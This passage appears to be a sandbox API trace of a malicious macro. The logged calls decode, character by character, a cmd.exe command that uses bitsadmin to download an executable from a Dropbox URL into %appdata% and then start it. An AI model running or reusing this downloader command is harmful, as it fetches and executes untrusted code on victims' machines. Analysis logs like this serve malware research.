pbstrResult=0x2867c0) returned 0x0 [0017.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="(", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="(\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="%") returned 1 [0017.150] VarBstrCat (in: bstrLeft="tyof.exe?dl=1 ", bstrRight="%", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0017.150] VarBstrCat (in: bstrLeft="tyof.exe?dl=1 %", bstrRight="a", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0017.150] VarBstrCat (in: bstrLeft="tyof.exe?dl=1 %a", bstrRight="p", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0017.151] VarBstrCat (in: bstrLeft="tyof.exe?dl=1 %ap", bstrRight="p", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0017.151] VarBstrCat (in: bstrLeft="tyof.exe?dl=1 %app", bstrRight="d", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0017.151] VarBstrCat (in: bstrLeft="tyof.exe?dl=1 %appd", bstrRight="a", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0017.151] VarBstrCat (in: bstrLeft="tyof.exe?dl=1 %appda", bstrRight="t", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0017.151] VarBstrCat (in: bstrLeft="tyof.exe?dl=1 %appdat", bstrRight="a", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="(", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="(\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="%") returned 1 [0017.151] VarBstrCat (in: bstrLeft="tyof.exe?dl=1 %appdata", bstrRight="%", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0017.151] VarBstrCat (in: bstrLeft="tyof.exe?dl=1 %appdata%", bstrRight="\\", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0017.151] VarBstrCat (in: bstrLeft="tyof.exe?dl=1 %appdata%\\", bstrRight="i", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0017.151] VarBstrCat (in: bstrLeft="tyof.exe?dl=1 %appdata%\\i", bstrRight="u", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.152] VarBstrCat (in: bstrLeft="tyof.exe?dl=1 %appdata%\\iu", bstrRight="o", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.152] VarBstrCat (in: bstrLeft="cmd.exe /c \"waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxi", bstrRight="tyof.exe?dl=1 %appdata%\\iuo", pbstrResult=0x286a80 | out: pbstrResult=0x286a80) returned 0x0 [0017.152] SafeArrayAllocData (psa=0x7818370) returned 0x0 [0017.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0017.152] VarBstrCat (in: bstrLeft=0x0, bstrRight="l", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0017.152] VarBstrCat (in: bstrLeft="l", bstrRight="d", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="z", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="z\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0017.152] VarBstrCat (in: bstrLeft="ld", bstrRight="w", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0017.152] VarBstrCat (in: bstrLeft="ldw", bstrRight=".", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="h\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0017.152] VarBstrCat (in: bstrLeft="ldw.", bstrRight="e", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0017.152] VarBstrCat (in: bstrLeft="ldw.e", bstrRight="x", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="h\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0017.152] VarBstrCat (in: bstrLeft="ldw.ex", bstrRight="e", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.152] VarBstrCat (in: bstrLeft="ldw.exe", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=")", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=")\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="&") returned 1 [0017.153] VarBstrCat (in: bstrLeft="ldw.exe ", bstrRight="&", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0017.153] VarBstrCat (in: bstrLeft="ldw.exe &", bstrRight="s", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0017.153] VarBstrCat (in: bstrLeft="ldw.exe &s", bstrRight="t", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x7831c88, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0017.153] VarBstrCat (in: bstrLeft="ldw.exe &st", bstrRight="a", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0017.153] VarBstrCat (in: bstrLeft="ldw.exe &sta", bstrRight="r", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0017.153] VarBstrCat (in: bstrLeft="ldw.exe &star", bstrRight="t", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.153] VarBstrCat (in: bstrLeft="ldw.exe &start", bstrRight=" ", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="(", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="(\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="%") returned 1 [0017.153] VarBstrCat (in: bstrLeft="ldw.exe &start ", bstrRight="%", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0017.153] VarBstrCat (in: bstrLeft="ldw.exe &start %", bstrRight="a", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0017.153] VarBstrCat (in: bstrLeft="ldw.exe &start %a", bstrRight="p", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0017.153] VarBstrCat (in: bstrLeft="ldw.exe &start %ap", bstrRight="p", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0017.153] VarBstrCat (in: bstrLeft="ldw.exe &start %app", bstrRight="d", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0017.154] VarBstrCat (in: bstrLeft="ldw.exe &start %appd", bstrRight="a", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0017.154] VarBstrCat (in: bstrLeft="ldw.exe &start %appda", bstrRight="t", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0017.154] VarBstrCat (in: bstrLeft="ldw.exe &start %appdat", bstrRight="a", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="(", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="(\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="%") returned 1 [0017.154] VarBstrCat (in: bstrLeft="ldw.exe &start %appdata", bstrRight="%", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0017.154] VarBstrCat (in: bstrLeft="ldw.exe &start %appdata%", bstrRight="\\", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0017.154] VarBstrCat (in: bstrLeft="ldw.exe &start %appdata%\\", bstrRight="i", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0017.154] VarBstrCat (in: bstrLeft="ldw.exe &start %appdata%\\i", bstrRight="u", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.154] VarBstrCat (in: bstrLeft="ldw.exe &start %appdata%\\iu", bstrRight="o", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0017.154] VarBstrCat (in: bstrLeft="ldw.exe &start %appdata%\\iuo", bstrRight="l", pbstrResult=0x2867c0 | out: pbstrResult=0x2867c0) returned 0x0 [0017.154] VarBstrCat (in: bstrLeft="cmd.exe /c \"waitfor /t 5 YKERQ & 